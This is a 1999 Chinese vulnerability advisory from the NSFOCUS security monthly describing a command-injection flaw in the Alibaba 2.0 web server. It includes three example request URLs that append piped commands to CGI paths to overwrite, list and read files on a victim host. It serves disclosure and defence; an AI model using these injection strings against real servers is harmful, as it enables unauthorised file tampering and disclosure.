首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第3期->最新漏洞
日期:1999-11-15
漏洞类型:远程、本地
发布日期:1999-11-03
更新日期:1999-11-04
影响系统:
Computer Software Manufaktur Alibaba 2.0
漏洞描述:
Alibaba webserver因为没有正确处理输入问题,其结果可以让攻击者在此服务器上查看、覆盖、创建和删除任何文件。
漏洞实例:
http ://victim.com/cgi-bin/get32.exe|echo%20>c:\file.txt
覆盖file.txt文件,get32.exe程序也允许在任何可执行文件中写入代码。
http ://www.victim.com/cgi-bin/alibaba.pl|dir
给出CGI目录的列表
http ://www.victim.com/cgi-bin/tst.bat|type%20c:\file.txt
列出file.txt的内容
版权所有,未经许可,不得转载